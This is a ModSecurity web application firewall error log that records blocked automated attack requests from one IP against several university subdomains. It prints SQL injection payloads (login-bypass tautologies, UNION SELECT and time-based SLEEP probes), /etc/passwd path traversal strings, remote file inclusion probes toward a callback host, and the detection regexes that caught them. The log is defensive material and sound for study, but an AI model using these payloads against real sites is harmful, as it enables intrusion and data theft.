[Tue Aug 29 11:35:20.438603 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11iMCo-f0AAAUOaWoAAABG"]
[Tue Aug 29 11:35:21.304909 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAATUxTgAAAAW"]
[Tue Aug 29 11:35:21.313046 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAATQXkMAAAAO"]
[Tue Aug 29 11:35:21.315684 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAATWYUEAAAAa"]
[Tue Aug 29 11:35:21.345543 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAT9PQ0AAAA1"]
[Tue Aug 29 11:35:21.345620 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAUKhB4AAABC"]
[Tue Aug 29 11:35:21.363591 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAATOA-8AAAAH"]
[Tue Aug 29 11:35:21.370997 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAAUR87sAAABI"]
[Tue Aug 29 11:35:21.372399 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11icCo-f0AAAUQ7uwAAABH"]
[Tue Aug 29 11:35:22.351722 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: ~31~27~20union found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAASHh-QAAAAD"]
[Tue Aug 29 11:35:22.358082 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: ~31~27~20union found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAVmuLYAAAAT"]
[Tue Aug 29 11:35:22.362771 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: ~31~27~20union found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAUQ7u0AAABH"]
[Tue Aug 29 11:35:22.370292 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11isCo-f0AAATavxAAAAAg"]
[Tue Aug 29 11:35:22.371983 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAATzVKsAAAAx"]
[Tue Aug 29 11:35:22.405350 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAASEJaMAAAAE"]
[Tue Aug 29 11:35:23.332104 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc))|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+ ..." at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "243"] [id "981247"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: ~31~27~20union found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11i8Co-f0AAAVPX4sAAAAF"]
[Tue Aug 29 11:35:23.357213 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAAUQ7vAAAABH"]
[Tue Aug 29 11:35:23.377339 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAATOBAIAAAAH"]
[Tue Aug 29 11:35:23.377730 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAATQXkcAAAAO"]
[Tue Aug 29 11:35:23.393209 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAAT9PRIAAAA1"]
[Tue Aug 29 11:35:24.309550 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAASHh-gAAAAD"]
[Tue Aug 29 11:35:24.315817 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jMCo-f0AAAUJI0sAAABB"]
[Tue Aug 29 11:35:24.325228 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATge94AAAAl"]
[Tue Aug 29 11:35:24.326419 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAVK0LEAAAAB"]
[Tue Aug 29 11:35:24.337283 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATUxT4AAAAW"]
[Tue Aug 29 11:35:24.338195 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAAT2JTUAAAAz"]
[Tue Aug 29 11:35:24.349318 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAASEJaUAAAAE"]
[Tue Aug 29 11:35:24.351170 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATzVK8AAAAx"]
[Tue Aug 29 11:35:25.313073 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAPDoS0AAAAP"]
[Tue Aug 29 11:35:25.320373 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAVmuLsAAAAT"]
